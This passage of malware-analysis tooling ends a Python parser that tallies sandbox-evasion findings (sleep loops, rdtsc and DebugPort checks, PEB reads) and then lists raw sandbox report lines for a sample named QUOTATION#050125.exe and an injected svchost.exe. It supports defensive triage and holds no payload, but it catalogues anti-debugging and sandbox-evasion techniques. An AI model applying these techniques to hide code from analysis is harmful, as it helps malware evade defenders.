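# lazy match stops at the first " | " that follows an optional TID field.
LINE_RE = re.compile(
    r"^Source:\s+(?P<src>.+?)(?:\s+TID:\s+(?P<tid>\d+))?\s+\|\s+(?P<finding>.+)$"
)
SLEEP_COUNT_RE = re.compile(r"Thread sleep count:\s+(\d+)")
SLEEP_TIME_RE = re.compile(r"Thread sleep time:\s+-(\d+)s")
PEB_READ_RE = re.compile(r"fs:\[00000030h\]")  # TEB+0x30 holds the PEB pointer on x86


def new_record():
    return {
        "sleep_calls": {},  # tid -> highest reported sleep count
        "sleep_ms": {},     # tid -> highest reported cumulative sleep time (ms, assumed)
        "rdtsc": 0,         # timing checks; rdtsc deltas expose instrumentation
        "debugport": 0,     # NtQueryInformationProcess(ProcessDebugPort) checks
        "peb_reads": 0,     # fs:[30h] loads feeding BeingDebugged / NtGlobalFlag checks
    }


def parse_findings(text):
    """Group evasion findings by process image name.

    The report repeats a thread's sleep counters at successive checkpoints,
    so the per-thread maximum is kept; summing would double count.
    """
    procs = defaultdict(new_record)
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue
        proc = m.group("src").rsplit("\\", 1)[-1]
        tid = m.group("tid") or "-"
        finding = m.group("finding")
        rec = procs[proc]
        count = SLEEP_COUNT_RE.search(finding)
        delay = SLEEP_TIME_RE.search(finding)
        if count:
            rec["sleep_calls"][tid] = max(rec["sleep_calls"].get(tid, 0), int(count.group(1)))
        elif delay:
            rec["sleep_ms"][tid] = max(rec["sleep_ms"].get(tid, 0), int(delay.group(1)))
        elif " rdtsc " in finding:
            rec["rdtsc"] += 1
        elif "DebugPort" in finding:
            rec["debugport"] += 1
        elif PEB_READ_RE.search(finding):
            rec["peb_reads"] += 1
        # "threadDelayed N" restates the sleep count and is deliberately ignored.
    return dict(procs)


def evasion_summary(procs, sandbox_seconds=180):
    """Condense each process into the numbers a triager needs.

    Assumption: the sleep-time figure is milliseconds (the per-call quotient
    in this report is exactly 2000, i.e. Sleep(2000) in a loop); the "s"
    suffix the report prints is treated as a label. The sandbox run length is
    not stated on the page; 180 s is a placeholder default.
    """
    out = {}
    for proc, rec in procs.items():
        total_seconds = sum(rec["sleep_ms"].values()) / 1000
        out[proc] = {
            "sleep_calls": sum(rec["sleep_calls"].values()),
            "delay_seconds": total_seconds,
            "outlasts_sandbox": total_seconds > sandbox_seconds,
            "rdtsc": rec["rdtsc"],
            "debugport": rec["debugport"],
            "peb_reads": rec["peb_reads"],
        }
    return out


if __name__ == "__main__":
    for proc, summary in evasion_summary(parse_findings(SAMPLE_FINDINGS)).items():
        print(f"{proc:24s} {summary}")
```

Run stand-alone it prints one line per process. For cmdkey.exe the 9852 sleeps add up to 19704 seconds, roughly five and a half hours of requested delay, which is far beyond any sandbox run and is exactly what the "Thread sleep count: 9852 > 30" signature is flagging; the 30-second delay in SwDwSdNMaTt.exe sits right at the report's threshold and is a much weaker indicator on its own.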
Source: C:\Users\user\Desktop\QUOTATION#050125.exe | Code function: 2_2_000E4CE8 mov eax, dword ptr fs:[00000030h] 2_2_000E4CE8
Source: C:\Users\user\Desktop\QUOTATION#050125.exe | Code function: 2_2_00E1B5E0 mov eax, dword ptr fs:[00000030h] 2_2_00E1B5E0
Source: C:\Users\user\Desktop\QUOTATION#050125.exe | Code function: 2_2_00E1B580 mov eax, dword ptr fs:[00000030h] 2_2_00E1B580
Source: C:\Users\user\Desktop\QUOTATION#050125.exe | Code function: 2_2_00E19F40 mov eax, dword ptr fs:[00000030h] 2_2_00E19F40
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0385A390 mov eax, dword ptr fs:[00000030h] 3_2_0385A390
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0385A390 mov eax, dword ptr fs:[00000030h] 3_2_0385A390
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0385A390 mov eax, dword ptr fs:[00000030h] 3_2_0385A390
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038D43BA mov eax, dword ptr fs:[00000030h] 3_2_038D43BA
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038D43BA mov eax, dword ptr fs:[00000030h] 3_2_038D43BA
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038AC3B0 mov eax, dword ptr fs:[00000030h] 3_2_038AC3B0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0382E3C0 mov eax, dword ptr fs:[00000030h] 3_2_0382E3C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0382E3C0 mov eax, dword ptr fs:[00000030h] 3_2_0382E3C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0382E3C0 mov eax, dword ptr fs:[00000030h] 3_2_0382E3C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0382C3C7 mov eax, dword ptr fs:[00000030h] 3_2_0382C3C7
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038363CB mov eax, dword ptr fs:[00000030h] 3_2_038363CB
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038643D0 mov ecx, dword ptr fs:[00000030h] 3_2_038643D0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038BE3DD mov eax, dword ptr fs:[00000030h] 3_2_038BE3DD
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038B43D5 mov eax, dword ptr fs:[00000030h] 3_2_038B43D5
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038D630E mov eax, dword ptr fs:[00000030h] 3_2_038D630E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0384E310 mov eax, dword ptr fs:[00000030h] 3_2_0384E310
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0384E310 mov eax, dword ptr fs:[00000030h] 3_2_0384E310
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0384E310 mov eax, dword ptr fs:[00000030h] 3_2_0384E310
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0386631F mov eax, dword ptr fs:[00000030h] 3_2_0386631F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03868322 mov eax, dword ptr fs:[00000030h] 3_2_03868322
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03868322 mov eax, dword ptr fs:[00000030h] 3_2_03868322
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03868322 mov eax, dword ptr fs:[00000030h] 3_2_03868322
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0382E328 mov eax, dword ptr fs:[00000030h] 3_2_0382E328
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0382E328 mov eax, dword ptr fs:[00000030h] 3_2_0382E328
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0382E328 mov eax, dword ptr fs:[00000030h] 3_2_0382E328
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038E4320 mov eax, dword ptr fs:[00000030h] 3_2_038E4320
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03828347 mov eax, dword ptr fs:[00000030h] 3_2_03828347
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03828347 mov eax, dword ptr fs:[00000030h] 3_2_03828347
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03828347 mov eax, dword ptr fs:[00000030h] 3_2_03828347
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0386A350 mov eax, dword ptr fs:[00000030h] 3_2_0386A350
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0386E363 mov eax, dword ptr fs:[00000030h] 3_2_0386E363
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0386E363 mov eax, dword ptr fs:[00000030h] 3_2_0386E363
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0386E363 mov eax, dword ptr fs:[00000030h] 3_2_0386E363
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0386E363 mov eax, dword ptr fs:[00000030h] 3_2_0386E363
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0386E363 mov eax, dword ptr fs:[00000030h] 3_2_0386E363
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0386E363 mov eax, dword ptr fs:[00000030h] 3_2_0386E363
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0386E363 mov eax, dword ptr fs:[00000030h] 3_2_0386E363
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0386E363 mov eax, dword ptr fs:[00000030h] 3_2_0386E363
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038AE372 mov eax, dword ptr fs:[00000030h] 3_2_038AE372
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038AE372 mov eax, dword ptr fs:[00000030h] 3_2_038AE372
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038AE372 mov eax, dword ptr fs:[00000030h] 3_2_038AE372
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038AE372 mov eax, dword ptr fs:[00000030h] 3_2_038AE372
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038B0371 mov eax, dword ptr fs:[00000030h] 3_2_038B0371
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038B0371 mov eax, dword ptr fs:[00000030h] 3_2_038B0371
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0385237A mov eax, dword ptr fs:[00000030h] 3_2_0385237A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038AE289 mov eax, dword ptr fs:[00000030h] 3_2_038AE289
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038542AF mov eax, dword ptr fs:[00000030h] 3_2_038542AF
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038542AF mov eax, dword ptr fs:[00000030h] 3_2_038542AF
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0382C2B0 mov ecx, dword ptr fs:[00000030h] 3_2_0382C2B0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0383A2E0 mov eax, dword ptr fs:[00000030h] 3_2_0383A2E0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0383A2E0 mov eax, dword ptr fs:[00000030h] 3_2_0383A2E0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0383A2E0 mov eax, dword ptr fs:[00000030h] 3_2_0383A2E0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0383A2E0 mov eax, dword ptr fs:[00000030h] 3_2_0383A2E0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0383A2E0 mov eax, dword ptr fs:[00000030h] 3_2_0383A2E0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0383A2E0 mov eax, dword ptr fs:[00000030h] 3_2_0383A2E0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038382E0 mov eax, dword ptr fs:[00000030h] 3_2_038382E0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038382E0 mov eax, dword ptr fs:[00000030h] 3_2_038382E0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038382E0 mov eax, dword ptr fs:[00000030h] 3_2_038382E0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038382E0 mov eax, dword ptr fs:[00000030h] 3_2_038382E0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038402F9 mov eax, dword ptr fs:[00000030h] 3_2_038402F9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038402F9 mov eax, dword ptr fs:[00000030h] 3_2_038402F9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038402F9 mov eax, dword ptr fs:[00000030h] 3_2_038402F9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038402F9 mov eax, dword ptr fs:[00000030h] 3_2_038402F9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038402F9 mov eax, dword ptr fs:[00000030h] 3_2_038402F9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038402F9 mov eax, dword ptr fs:[00000030h] 3_2_038402F9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038402F9 mov eax, dword ptr fs:[00000030h] 3_2_038402F9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038402F9 mov eax, dword ptr fs:[00000030h] 3_2_038402F9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0382A200 mov eax, dword ptr fs:[00000030h] 3_2_0382A200
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0382821B mov eax, dword ptr fs:[00000030h] 3_2_0382821B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038B0227 mov eax, dword ptr fs:[00000030h] 3_2_038B0227
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038B0227 mov eax, dword ptr fs:[00000030h] 3_2_038B0227
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038B0227 mov eax, dword ptr fs:[00000030h] 3_2_038B0227
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0386A22B mov eax, dword ptr fs:[00000030h] 3_2_0386A22B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0386A22B mov eax, dword ptr fs:[00000030h] 3_2_0386A22B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0386A22B mov eax, dword ptr fs:[00000030h] 3_2_0386A22B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03850230 mov ecx, dword ptr fs:[00000030h] 3_2_03850230
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03834180 mov eax, dword ptr fs:[00000030h] 3_2_03834180
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03834180 mov eax, dword ptr fs:[00000030h] 3_2_03834180
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03834180 mov eax, dword ptr fs:[00000030h] 3_2_03834180
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0386E1A4 mov eax, dword ptr fs:[00000030h] 3_2_0386E1A4
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0386E1A4 mov eax, dword ptr fs:[00000030h] 3_2_0386E1A4
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038641BB mov ecx, dword ptr fs:[00000030h] 3_2_038641BB
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038641BB mov eax, dword ptr fs:[00000030h] 3_2_038641BB
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038641BB mov eax, dword ptr fs:[00000030h] 3_2_038641BB
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038401C0 mov eax, dword ptr fs:[00000030h] 3_2_038401C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038401C0 mov eax, dword ptr fs:[00000030h] 3_2_038401C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0383A1E3 mov eax, dword ptr fs:[00000030h] 3_2_0383A1E3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0383A1E3 mov eax, dword ptr fs:[00000030h] 3_2_0383A1E3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0383A1E3 mov eax, dword ptr fs:[00000030h] 3_2_0383A1E3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0383A1E3 mov eax, dword ptr fs:[00000030h] 3_2_0383A1E3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0383A1E3 mov eax, dword ptr fs:[00000030h] 3_2_0383A1E3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038F81EE mov eax, dword ptr fs:[00000030h] 3_2_038F81EE
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038F81EE mov eax, dword ptr fs:[00000030h] 3_2_038F81EE
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038281EB mov eax, dword ptr fs:[00000030h] 3_2_038281EB
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038401F1 mov eax, dword ptr fs:[00000030h] 3_2_038401F1
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038401F1 mov eax, dword ptr fs:[00000030h] 3_2_038401F1
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038401F1 mov eax, dword ptr fs:[00000030h] 3_2_038401F1
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03860118 mov eax, dword ptr fs:[00000030h] 3_2_03860118
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038BA130 mov eax, dword ptr fs:[00000030h] 3_2_038BA130
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0382A147 mov eax, dword ptr fs:[00000030h] 3_2_0382A147
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0382A147 mov eax, dword ptr fs:[00000030h] 3_2_0382A147
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0382A147 mov eax, dword ptr fs:[00000030h] 3_2_0382A147
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0386415F mov eax, dword ptr fs:[00000030h] 3_2_0386415F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03836179 mov eax, dword ptr fs:[00000030h] 3_2_03836179
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03904080 mov eax, dword ptr fs:[00000030h] 3_2_03904080
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03904080 mov eax, dword ptr fs:[00000030h] 3_2_03904080
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03904080 mov eax, dword ptr fs:[00000030h] 3_2_03904080
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03904080 mov eax, dword ptr fs:[00000030h] 3_2_03904080
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03904080 mov eax, dword ptr fs:[00000030h] 3_2_03904080
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03904080 mov eax, dword ptr fs:[00000030h] 3_2_03904080
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03904080 mov eax, dword ptr fs:[00000030h] 3_2_03904080
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0382A093 mov ecx, dword ptr fs:[00000030h] 3_2_0382A093
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0382C090 mov eax, dword ptr fs:[00000030h] 3_2_0382C090
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038C6090 mov eax, dword ptr fs:[00000030h] 3_2_038C6090
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038700A5 mov eax, dword ptr fs:[00000030h] 3_2_038700A5
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038B60A0 mov eax, dword ptr fs:[00000030h] 3_2_038B60A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038B60A0 mov eax, dword ptr fs:[00000030h] 3_2_038B60A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038B60A0 mov eax, dword ptr fs:[00000030h] 3_2_038B60A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038B60A0 mov eax, dword ptr fs:[00000030h] 3_2_038B60A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038B60A0 mov eax, dword ptr fs:[00000030h] 3_2_038B60A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038B60A0 mov eax, dword ptr fs:[00000030h] 3_2_038B60A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038B60A0 mov eax, dword ptr fs:[00000030h] 3_2_038B60A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038BC0E0 mov ecx, dword ptr fs:[00000030h] 3_2_038BC0E0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0382C0F6 mov eax, dword ptr fs:[00000030h] 3_2_0382C0F6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03838009 mov eax, dword ptr fs:[00000030h] 3_2_03838009
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03872010 mov ecx, dword ptr fs:[00000030h] 3_2_03872010
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03860044 mov eax, dword ptr fs:[00000030h] 3_2_03860044
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038B6040 mov eax, dword ptr fs:[00000030h] 3_2_038B6040
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03836074 mov eax, dword ptr fs:[00000030h] 3_2_03836074
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03836074 mov eax, dword ptr fs:[00000030h]3_2_03836074
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038AE79D mov eax, dword ptr fs:[00000030h]3_2_038AE79D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038AE79D mov eax, dword ptr fs:[00000030h]3_2_038AE79D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038AE79D mov eax, dword ptr fs:[00000030h]3_2_038AE79D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038AE79D mov eax, dword ptr fs:[00000030h]3_2_038AE79D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038AE79D mov eax, dword ptr fs:[00000030h]3_2_038AE79D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038AE79D mov eax, dword ptr fs:[00000030h]3_2_038AE79D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038AE79D mov eax, dword ptr fs:[00000030h]3_2_038AE79D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038AE79D mov eax, dword ptr fs:[00000030h]3_2_038AE79D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038AE79D mov eax, dword ptr fs:[00000030h]3_2_038AE79D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038307A7 mov eax, dword ptr fs:[00000030h]3_2_038307A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D47B4 mov eax, dword ptr fs:[00000030h]3_2_038D47B4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D47B4 mov eax, dword ptr fs:[00000030h]3_2_038D47B4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D47B4 mov eax, dword ptr fs:[00000030h]3_2_038D47B4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D47B4 mov eax, dword ptr fs:[00000030h]3_2_038D47B4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D47B4 mov eax, dword ptr fs:[00000030h]3_2_038D47B4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D47B4 mov eax, dword ptr fs:[00000030h]3_2_038D47B4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D47B4 mov ecx, dword ptr fs:[00000030h]3_2_038D47B4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038CC7B0 mov eax, dword ptr fs:[00000030h]3_2_038CC7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038CC7B0 mov eax, dword ptr fs:[00000030h]3_2_038CC7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385E7E0 mov eax, dword ptr fs:[00000030h]3_2_0385E7E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385270D mov eax, dword ptr fs:[00000030h]3_2_0385270D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385270D mov eax, dword ptr fs:[00000030h]3_2_0385270D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385270D mov eax, dword ptr fs:[00000030h]3_2_0385270D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383471B mov eax, dword ptr fs:[00000030h]3_2_0383471B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383471B mov eax, dword ptr fs:[00000030h]3_2_0383471B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E4730 mov eax, dword ptr fs:[00000030h]3_2_038E4730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E4730 mov eax, dword ptr fs:[00000030h]3_2_038E4730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03852755 mov eax, dword ptr fs:[00000030h]3_2_03852755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03852755 mov eax, dword ptr fs:[00000030h]3_2_03852755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03852755 mov eax, dword ptr fs:[00000030h]3_2_03852755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03852755 mov ecx, dword ptr fs:[00000030h]3_2_03852755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03852755 mov eax, dword ptr fs:[00000030h]3_2_03852755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03852755 mov eax, dword ptr fs:[00000030h]3_2_03852755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386A750 mov eax, dword ptr fs:[00000030h]3_2_0386A750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038DE750 mov eax, dword ptr fs:[00000030h]3_2_038DE750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03842760 mov ecx, dword ptr fs:[00000030h]3_2_03842760
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03860774 mov eax, dword ptr fs:[00000030h]3_2_03860774
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03834779 mov eax, dword ptr fs:[00000030h]3_2_03834779
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03834779 mov eax, dword ptr fs:[00000030h]3_2_03834779
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840680 mov eax, dword ptr fs:[00000030h]3_2_03840680
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840680 mov eax, dword ptr fs:[00000030h]3_2_03840680
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840680 mov eax, dword ptr fs:[00000030h]3_2_03840680
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840680 mov eax, dword ptr fs:[00000030h]3_2_03840680
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840680 mov eax, dword ptr fs:[00000030h]3_2_03840680
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840680 mov eax, dword ptr fs:[00000030h]3_2_03840680
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840680 mov eax, dword ptr fs:[00000030h]3_2_03840680
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840680 mov eax, dword ptr fs:[00000030h]3_2_03840680
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840680 mov eax, dword ptr fs:[00000030h]3_2_03840680
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840680 mov eax, dword ptr fs:[00000030h]3_2_03840680
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840680 mov eax, dword ptr fs:[00000030h]3_2_03840680
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03840680 mov eax, dword ptr fs:[00000030h]3_2_03840680
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03838690 mov eax, dword ptr fs:[00000030h]3_2_03838690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038BC691 mov eax, dword ptr fs:[00000030h]3_2_038BC691
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038F86A8 mov eax, dword ptr fs:[00000030h]3_2_038F86A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038F86A8 mov eax, dword ptr fs:[00000030h]3_2_038F86A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E46CB mov eax, dword ptr fs:[00000030h]3_2_038E46CB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E46CB mov eax, dword ptr fs:[00000030h]3_2_038E46CB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038306CF mov eax, dword ptr fs:[00000030h]3_2_038306CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038FA6C0 mov eax, dword ptr fs:[00000030h]3_2_038FA6C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D86C2 mov eax, dword ptr fs:[00000030h]3_2_038D86C2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038C66D0 mov eax, dword ptr fs:[00000030h]3_2_038C66D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038C66D0 mov eax, dword ptr fs:[00000030h]3_2_038C66D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038DE6D0 mov eax, dword ptr fs:[00000030h]3_2_038DE6D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383C6E0 mov eax, dword ptr fs:[00000030h]3_2_0383C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038566E0 mov eax, dword ptr fs:[00000030h]3_2_038566E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038566E0 mov eax, dword ptr fs:[00000030h]3_2_038566E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038AC6F2 mov eax, dword ptr fs:[00000030h]3_2_038AC6F2
